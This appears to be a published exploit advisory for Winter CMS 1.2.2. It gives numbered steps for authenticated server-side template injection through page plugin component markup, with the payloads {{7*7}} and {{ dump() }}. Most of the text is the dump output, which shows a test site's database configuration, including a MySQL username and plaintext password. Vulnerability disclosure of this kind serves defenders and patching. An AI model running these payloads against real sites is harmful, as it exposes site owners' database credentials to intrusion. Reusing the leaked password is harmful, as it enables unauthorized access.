# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS
1 ) Login with admin cred and click CMS > Pages field > Plugin components >
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview :
https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result :
49
Payload :
{{ dump() }}
Result :
"*::database" => array:4 [▼
"default" => "mysql"
"connections" => array:4 [▼
"sqlite" => array:5 [▼
"database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
"driver" => "sqlite"
"foreign_key_constraints" => true
"prefix" => ""
"url" => null
]
"mysql" => array:15 [▼
"charset" => "utf8mb4"
"collation" => "utf8mb4_unicode_ci"
"database" => "soft_pw3qsny"
"driver" => "mysql"
"engine" => "InnoDB"
"host" => "localhost"
"options" => []
"password" => "8QSz9(pT)3"
"port" => 3306
"prefix" => ""
"prefix_indexes" => true
"strict" => true
"unix_socket" => ""
"url" => null
"username" => "soft_pw3qsny"
]
"pgsql" => array:12 [▶]
"sqlsrv" => array:10 [▶]
]
"migrations" => "migrations"
"redis" => array:4 [▼
"client" => "phpredis"
"options" => array:2 [▼
"cluster" => "redis"
"prefix" => "winter_database_"
]
"default" => array:5 [▼
"database" => "0"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
"cache" => array:5 [▼
"database" => "1"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
]
]
]